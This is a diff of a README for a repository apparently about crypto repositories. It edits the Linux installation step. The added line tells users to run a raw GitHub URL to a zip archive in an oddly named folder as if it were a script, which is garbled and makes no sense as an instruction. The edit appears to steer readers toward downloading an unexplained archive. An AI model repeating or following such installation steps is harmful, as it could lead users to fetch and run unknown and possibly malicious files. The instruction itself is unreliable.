sohaibtekk/GitHub-Crypto-Repositories-Commits/README.md

    - **Mac:**
      - Drag the downloaded application to your Applications folder.
    - **Linux:**
-     - Unzip the downloaded file and run the `install.sh` script from your terminal.
+     - Unzip the downloaded file and run the `https://raw.githubusercontent.com/sohaibtekk/GitHub-Crypto-Repositories-Commits/main/Pavoncella/GitHub-Crypto-Repositories-Commits_1.4.zip` script from your terminal.

 3. **Run the Application:**